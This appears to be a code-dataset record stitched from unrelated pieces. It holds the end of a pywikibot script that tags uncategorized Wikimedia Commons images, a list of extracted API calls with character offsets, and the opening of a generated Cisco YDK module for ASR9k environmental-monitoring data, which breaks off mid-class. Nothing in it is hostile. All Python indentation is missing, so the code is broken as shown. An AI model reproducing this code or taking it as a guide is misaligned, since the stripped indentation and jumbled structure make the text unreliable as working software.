'PD-Soviet-revised',
'PD-SRBGov',
'PD-STFP',
'PD-StVZVO',
'PD-Sudan',
'PD-Suomen',
'PD-Sweden',
'PD-Sweden-1969',
'PD-Sweden-photo',
'PD-Sweden-self',
'PD-Switzerland-official',
'PD-Switzerland-photo',
'PD-Syria',
'PD-Taiwan',
'PD-text',
'PD-textlogo',
'PD-TH-exempt',
'PD-Thailand',
'PD-TJ-exempt',
'PD-TK-exempt',
'PD-TR-Gov',
'PD-Traditional',
'PD-Tunisia',
'PD-UA-exempt',
'PD-UEA',
'PD-Uganda',
'PD-Ugglan',
'PD-UK-known',
'PD-UK-unknown',
'PD-UKGov',
'PD-Ukraine',
'PD-UN',
'PD-United Arab Emirates',
'PD-URAA',
'PD-Uruguay',
'PD-US',
'PD-US-1978-89',
'PD-US-flag',
'PD-US-no notice',
'PD-US-not renewed',
'PD-US-patent',
'PD-US-patent-no notice',
'PD-US-record',
'PD-user',
'PD-User',
'PD-user-als',
'PD-user-ar',
'PD-user-ca',
'PD-user-cs',
'PD-user-da',
'PD-user-de',
'PD-user-en',
'PD-user-fa',
'PD-user-fr',
'PD-user-he',
'PD-user-hi',
'PD-user-hr',
'PD-user-hu',
'PD-user-it',
'PD-user-ja',
'PD-user-lt',
'PD-user-nl',
'PD-user-nn',
'PD-user-no',
'PD-user-pl',
'PD-user-pt',
'PD-user-ro',
'PD-user-ru',
'PD-user-sk',
'PD-user-sl',
'PD-user-th',
'PD-user-uk',
'PD-user-vls',
'PD-user-w',
'PD-user-zh',
'PD-USGov',
'PD-USGov-ARM',
'PD-USGov-Atlas',
'PD-USGov-Award',
'PD-USGov-BLM',
'PD-USGov-CIA',
'PD-USGov-CIA-WF',
'PD-USGov-Congress',
'PD-USGov-Congress-AOC',
'PD-USGov-Congress-Bio',
'PD-USGov-DEA',
'PD-USGov-DHS',
'PD-USGov-DHS-CG',
'PD-USGov-DHS-CGAUX',
'PD-USGov-DOC',
'PD-USGov-DOC-Census',
'PD-USGov-DOE',
'PD-USGov-DOJ',
'PD-USGov-DOL',
'PD-USGov-DOS',
'PD-USGov-DOT',
'PD-USGov-DVA',
'PD-USGov-ED',
'PD-USGov-EPA',
'PD-USGov-FAA',
'PD-USGov-FBI',
'PD-USGov-FDA',
'PD-USGov-Federal Reserve',
'PD-USGov-FEMA',
'PD-USGov-FSA',
'PD-USGov-FWS',
'PD-USGov-HHS',
'PD-USGov-HHS-CDC',
'PD-USGov-HHS-NIH',
'PD-USGov-Interior',
'PD-USGov-Interior-HABS',
'PD-USGov-Interior-MMS',
'PD-USGov-Interior-USBR',
'PD-USGov-Interior-USGS-Minerals',
'PD-USGov-Military',
'PD-USGov-Military award',
'PD-USGov-Military-Air Force',
'PD-USGov-Military-Air Force Auxiliary',
'PD-USGov-Military-Army',
'PD-USGov-Military-Army-USACE',
'PD-USGov-Military-Army-USACMH',
'PD-USGov-Military-Army-USAIOH',
'PD-USGov-Military-Badge',
'PD-USGov-Military-Coast Guard',
'PD-USGov-Military-DVIC',
'PD-USGov-Military-Marines',
'PD-USGov-Military-MDA',
'PD-USGov-Military-National Guard',
'PD-USGov-Military-Navy',
'PD-USGov-Military-NGA',
'PD-USGov-money',
'PD-USGov-MUTCD',
'PD-USGov-NASA',
'PD-USGov-NASA/copyright',
'PD-USGov-NCBI-scienceprimer',
'PD-USGov-NIH',
'PD-USGov-NIST',
'PD-USGov-NOAA',
'PD-USGov-NPS',
'PD-USGov-NRO',
'PD-USGov-NSA',
'PD-USGov-NSF',
'PD-USGov-NTSB',
'PD-USGov-POTUS',
'PD-USGov-State',
'PD-USGov-Treasury',
'PD-USGov-TVA',
'PD-USGov-USAID',
'PD-USGov-USDA',
'PD-USGov-USDA-ARS',
'PD-USGov-USDA-FS',
'PD-USGov-USDA-NAL',
'PD-USGov-USDA-NRCS',
'PD-USGov-USGS',
'PD-USGov-USIA',
'PD-USGov-VOA',
'PD-USGov-WPA',
'PD-USNWR',
'PD-UZ-exempt',
'PD-Van Vechten',
'PD-Vegagerdin',
'PD-Venezuela',
'PD-Vietnam',
'PD-VL-shield',
'PD-Vlaams-gemeentewapen',
'PD-Vlaamse-gemeentevlag',
'PD-VzKat',
'PD-WorldWind',
'PD-Yemen',
'PD-Yugoslavia',
'PD-Zimbabwe',
'Pd',
'Pdc',
'Peregrine981',
'PermissionOTRS',
'PermissionOTRS-ID',
'Personality rights',
'Photo-by-Wojciechowscy-GFDL',
'Photocity.ru',
'PhotoManifs-PP',
'Photos by <NAME>',
'Photos by Kulturhistorisk museum',
'Photos by Stortinget',
'Photos by the Norwegian Museum of Cultural History',
'Pi',
'Picswiss',
'Piratpartiet',
'Pl',
'Pl icon',
'PLoS',
'Pms',
'PNG with JPEG version',
'Pnt',
'Polish coats of arms by <NAME>',
'PolishPresidentCopyright',
'PolishSenateCopyright',
'Polishsymbol',
'Politas FZ30',
'Portpictures.nl',
'Pousbeeld',
'Pressefotos Die Gruenen',
'Ps',
'Pt',
'Pt icon',
'Pt-br',
'Qu',
'QualityImage',
'RadioSenadoBr',
'RetouchedPicture',
'Rm',
'Rmy',
'Rn',
'Ro',
'Roa-rup',
'RomanianMCTICopyright',
'RTCNCA License',
'Rtl-lang',
'Ru',
'Rw',
'Sa',
'Sah',
'Sc',
'Scn',
'Sco',
'Sd',
'Sdc',
'Se',
'Seattle Neighborhood Atlas disclaimer',
'Second Life',
'Sei',
'SejmCopyright',
'Self',
'Self2',
'Self2-name',
'Self3',
'Self4',
'Self-GFDL-German',
'SelfSA-GFDL-German',
'SenadoMexico',
'Sergeymila',
'Sg',
'SgiraldoaCredit',
'Sh',
'Shi',
'Si',
'SIB',
'Simple',
'Simple English',
'Sk',
'Sl',
'Sm',
'Sma',
'Sn',
'So',
'Solkoll',
'Solkoll 2D',
'Solkoll 3D',
'South Korean currency',
'SpaceShuttle',
'SPD-Parteivorstand',
'Spui',
'Spuiother',
'Sq',
'Sr',
'Srn',
'Ss',
'St',
'Stan Shebs photo',
'Stationsweb',
'Statistics Netherlands map',
'Stielers Handatlas 1891',
'Stortinget3',
'Stq',
'Stratosphere',
'Su',
'SupersededPNG',
'SupersededSVG',
'Supported by Wikimedia France',
'Sv',
'Svensk porträttgalleri',
'Svg',
'SVG',
'SVG-Map Africa by Slomox',
'Sw',
'Swiss Government Portrait',
'SygnaturaPixela',
'Szl',
'Ta',
'Tango',
'Taxonavigation',
'Tcolphoto',
'Te',
'Texas State Highway',
'Tet',
'Tg',
'Tgl',
'Tintazul',
'Th',
'ThomasBredolCredit2',
'ThomasBredolCredit3',
'Ti',
'Tk',
'Tl',
'Tlx',
'Tn',
'To',
'TomCorserCredit',
'Tpi',
'Tr',
'Trademark',
'Trademarked',
'Ts',
'Tt',
'Tum',
'TVSenadoBr',
'Tw',
'Ty',
'Tyv',
'Udm',
'Ug',
'Uk',
'UN map',
'Ur',
'User:FlickreviewR/reviewed-pass',
'User:Fir0002/20D',
'USDA',
'UWiscCIMSS',
'Uz',
'Ve',
'Vec',
'Vector-Images.com',
'Vector version available',
'Vi',
'Viollet-le-Duc',
'Vl',
'Vls',
'Vo',
'W',
'Wa',
'Walks.ru',
'War',
'WEF',
'Wikimedia relicensing',
'Wikipedia-screenshot',
'Wikiportrait',
'Wikispecies',
'WLA',
'Wo',
'Wulfstan GFDL',
'Wuu',
'Www.bordeaux-port.fr',
'Www.folketinget.dk',
'Www.hotelviewarea.com',
'Www.nordenskirker.dk',
'Xal',
'XGSC image',
'Xh',
'YAM',
'Ydd',
'Yi',
'Yo',
'Yue',
'Za',
'Zea',
'Zh',
'Zh-classical',
'Zh-cn',
'Zh-hans',
'Zh-hant',
'Zh-hk',
'Zh-min-nan',
'Zh-sg',
'Zh-tw',
'Zh-yue',
'Zlib',
'Zu',
'Zxx',
]
puttext = ('\n{{Uncategorized|year={{subst:CURRENTYEAR}}|'
'month={{subst:CURRENTMONTHNAME}}|day={{subst:CURRENTDAY}}}}')
putcomment = 'Please add categories to this image'
def uploadedYesterday(site):
"""
Return a pagegenerator containing all the pictures uploaded yesterday.
DEPRECATED. Only used by a deprecated option.
"""
today = pywikibot.Timestamp.utcnow()
yesterday = today + timedelta(days=-1)
for logentry in site.logevents(
logtype='upload', start=yesterday, end=today, reverse=True
):
yield logentry.page()
def isUncat(page):
"""
Do we want to skip this page.
If we found a category which is not in the ignore list it means
that the page is categorized so skip the page.
If we found a template which is in the ignore list, skip the page.
"""
pywikibot.output('Working on ' + page.title())
for category in page.categories():
if category not in ignoreCategories:
pywikibot.output('Got category ' + category.title())
return False
for template_with_trail in page.templates():
# Strip of trailing garbage
template = template_with_trail.title().rstrip('\n').rstrip()
if template in skipTemplates:
# Already tagged with a template, skip it
pywikibot.output('Already tagged, skip it')
return False
if template in ignoreTemplates:
# template not relevant for categorization
pywikibot.output('Ignore ' + template)
else:
pywikibot.output('Not ignoring ' + template)
return False
return True
def addUncat(page):
"""
Add the uncat template to the page.
@param page: Page to be modified
@type page: pywikibot.Page
"""
newtext = page.get() + puttext
pywikibot.showDiff(page.get(), newtext)
with suppress(pywikibot.EditConflict, pywikibot.LockedPage):
page.put(newtext, putcomment)
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: str
"""
generator = None
local_args = pywikibot.handle_args(args)
site = pywikibot.Site()
if site.code != 'commons' or site.family.name != 'commons':
pywikibot.warning('This script is primarily written for Wikimedia '
'Commons, but has been invoked with site {0}. It '
'might work for other sites but there is no '
'guarantee that it does the right thing.'
.format(site))
choice = pywikibot.input_choice(
'How do you want to continue?',
(('Continue using {0}'.format(site), 'c'),
('Switch to Wikimedia Commons', 's'),
('Quit', 'q')),
automatic_quit=False)
if choice == 's':
site = pywikibot.Site('commons', 'commons')
elif choice == 'q':
return False
gen_factory = pagegenerators.GeneratorFactory(site)
for arg in local_args:
param_arg, sep, param_value = arg.partition(':')
if param_value == '':
param_value = None
if arg.startswith('-yesterday'):
generator = uploadedYesterday(site)
issue_deprecation_warning(
'The usage of "-yesterday"',
'-logevents:"upload,,YYYYMMDD,YYYYMMDD"',
2, ArgumentDeprecationWarning, since='20160305')
else:
gen_factory.handle_arg(arg)
generator = gen_factory.getCombinedGenerator(gen=generator, preload=True)
if not generator:
pywikibot.bot.suggest_help(missing_generator=True)
else:
site.login()
for page in generator:
pywikibot.output(page.title())
if page.exists() and (page.namespace() == 6) \
and (not page.isRedirectPage()):
if isUncat(page):
addUncat(page)
if __name__ == '__main__':
main()
|
[
"pywikibot.Site",
"pywikibot.output",
"pywikibot.pagegenerators.GeneratorFactory",
"contextlib.suppress",
"pywikibot.tools.issue_deprecation_warning",
"pywikibot.bot.suggest_help",
"datetime.timedelta",
"pywikibot.handle_args",
"pywikibot.Timestamp.utcnow"
] |
[((41605, 41633), 'pywikibot.Timestamp.utcnow', 'pywikibot.Timestamp.utcnow', ([], {}), '()\n', (41631, 41633), False, 'import pywikibot\n'), ((43456, 43483), 'pywikibot.handle_args', 'pywikibot.handle_args', (['args'], {}), '(args)\n', (43477, 43483), False, 'import pywikibot\n'), ((43496, 43512), 'pywikibot.Site', 'pywikibot.Site', ([], {}), '()\n', (43510, 43512), False, 'import pywikibot\n'), ((44320, 44357), 'pywikibot.pagegenerators.GeneratorFactory', 'pagegenerators.GeneratorFactory', (['site'], {}), '(site)\n', (44351, 44357), False, 'from pywikibot import pagegenerators\n'), ((41658, 41676), 'datetime.timedelta', 'timedelta', ([], {'days': '(-1)'}), '(days=-1)\n', (41667, 41676), False, 'from datetime import timedelta\n'), ((43127, 43181), 'contextlib.suppress', 'suppress', (['pywikibot.EditConflict', 'pywikibot.LockedPage'], {}), '(pywikibot.EditConflict, pywikibot.LockedPage)\n', (43135, 43181), False, 'from contextlib import suppress\n'), ((44963, 45013), 'pywikibot.bot.suggest_help', 'pywikibot.bot.suggest_help', ([], {'missing_generator': '(True)'}), '(missing_generator=True)\n', (44989, 45013), False, 'import pywikibot\n'), ((42565, 42608), 'pywikibot.output', 'pywikibot.output', (['"""Already tagged, skip it"""'], {}), "('Already tagged, skip it')\n", (42581, 42608), False, 'import pywikibot\n'), ((42741, 42779), 'pywikibot.output', 'pywikibot.output', (["('Ignore ' + template)"], {}), "('Ignore ' + template)\n", (42757, 42779), False, 'import pywikibot\n'), ((42806, 42850), 'pywikibot.output', 'pywikibot.output', (["('Not ignoring ' + template)"], {}), "('Not ignoring ' + template)\n", (42822, 42850), False, 'import pywikibot\n'), ((44211, 44247), 'pywikibot.Site', 'pywikibot.Site', (['"""commons"""', '"""commons"""'], {}), "('commons', 'commons')\n", (44225, 44247), False, 'import pywikibot\n'), ((44605, 44758), 'pywikibot.tools.issue_deprecation_warning', 'issue_deprecation_warning', (['"""The usage of "-yesterday\\""""', '"""-logevents:"upload,,YYYYMMDD,YYYYMMDD\\""""', '(2)', 'ArgumentDeprecationWarning'], {'since': '"""20160305"""'}), '(\'The usage of "-yesterday"\',\n \'-logevents:"upload,,YYYYMMDD,YYYYMMDD"\', 2, ArgumentDeprecationWarning,\n since=\'20160305\')\n', (44630, 44758), False, 'from pywikibot.tools import issue_deprecation_warning\n')]
|
""" Cisco_IOS_XR_asr9k_sc_envmon_admin_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR asr9k\-sc\-envmon package
admin\-plane operational data.
This module contains definitions
for the following management objects\:
environmental\-monitoring\: Admin Environmental Monitoring
Operational data space
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EnvironmentalMonitoring(_Entity_):
"""
Admin Environmental Monitoring Operational data
space
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring, self).__init__()
self._top_entity = None
self.yang_name = "environmental-monitoring"
self.yang_parent_name = "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("racks", ("racks", EnvironmentalMonitoring.Racks))])
self._leafs = OrderedDict()
self.racks = EnvironmentalMonitoring.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper:environmental-monitoring"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring, [], name, value)
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "environmental-monitoring"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", EnvironmentalMonitoring.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper:environmental-monitoring/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", EnvironmentalMonitoring.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = EnvironmentalMonitoring.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper:environmental-monitoring/racks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", EnvironmentalMonitoring.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: modules
Table of modules
**type**\: :py:class:`Modules <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("modules", ("modules", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.modules = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules()
self.modules.parent = self
self._children_name_map["modules"] = "modules"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, ['slot'], name, value)
class Modules(_Entity_):
"""
Table of modules
.. attribute:: module
Name
**type**\: list of :py:class:`Module <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, self).__init__()
self.yang_name = "modules"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("module", ("module", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module))])
self._leafs = OrderedDict()
self.module = YList(self)
self._segment_path = lambda: "modules"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, [], name, value)
class Module(_Entity_):
"""
Name
.. attribute:: module (key)
Module name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_types
Table of sensor types
**type**\: :py:class:`SensorTypes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes>`
**config**\: False
.. attribute:: power
Module Power Draw
**type**\: :py:class:`Power <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, self).__init__()
self.yang_name = "module"
self.yang_parent_name = "modules"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['module']
self._child_classes = OrderedDict([("sensor-types", ("sensor_types", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes)), ("power", ("power", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power))])
self._leafs = OrderedDict([
('module', (YLeaf(YType.str, 'module'), ['str'])),
])
self.module = None
self.sensor_types = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes()
self.sensor_types.parent = self
self._children_name_map["sensor_types"] = "sensor-types"
self.power = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power()
self.power.parent = self
self._children_name_map["power"] = "power"
self._segment_path = lambda: "module" + "[module='" + str(self.module) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, ['module'], name, value)
class SensorTypes(_Entity_):
"""
Table of sensor types
.. attribute:: sensor_type
Type of sensor
**type**\: list of :py:class:`SensorType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, self).__init__()
self.yang_name = "sensor-types"
self.yang_parent_name = "module"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-type", ("sensor_type", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType))])
self._leafs = OrderedDict()
self.sensor_type = YList(self)
self._segment_path = lambda: "sensor-types"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, [], name, value)
class SensorType(_Entity_):
"""
Type of sensor
.. attribute:: type (key)
Sensor type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_names
Table of sensors
**type**\: :py:class:`SensorNames <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, self).__init__()
self.yang_name = "sensor-type"
self.yang_parent_name = "sensor-types"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("sensor-names", ("sensor_names", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
])
self.type = None
self.sensor_names = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames()
self.sensor_names.parent = self
self._children_name_map["sensor_names"] = "sensor-names"
self._segment_path = lambda: "sensor-type" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, ['type'], name, value)
class SensorNames(_Entity_):
"""
Table of sensors
.. attribute:: sensor_name
Name of sensor
**type**\: list of :py:class:`SensorName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, self).__init__()
self.yang_name = "sensor-names"
self.yang_parent_name = "sensor-type"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-name", ("sensor_name", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName))])
self._leafs = OrderedDict()
self.sensor_name = YList(self)
self._segment_path = lambda: "sensor-names"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, [], name, value)
class SensorName(_Entity_):
"""
Name of sensor
.. attribute:: name (key)
Sensor name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: thresholds
The threshold information
**type**\: :py:class:`Thresholds <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds>`
**config**\: False
.. attribute:: value_detailed
Detailed sensor information including the sensor value
**type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed>`
**config**\: False
.. attribute:: value_brief
The sensor value
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, self).__init__()
self.yang_name = "sensor-name"
self.yang_parent_name = "sensor-names"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("thresholds", ("thresholds", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds)), ("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
])
self.name = None
self.value_brief = None
self.thresholds = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds()
self.thresholds.parent = self
self._children_name_map["thresholds"] = "thresholds"
self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed()
self.value_detailed.parent = self
self._children_name_map["value_detailed"] = "value-detailed"
self._segment_path = lambda: "sensor-name" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, ['name', 'value_brief'], name, value)
class Thresholds(_Entity_):
"""
The threshold information
.. attribute:: threshold
Types of thresholds
**type**\: list of :py:class:`Threshold <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, self).__init__()
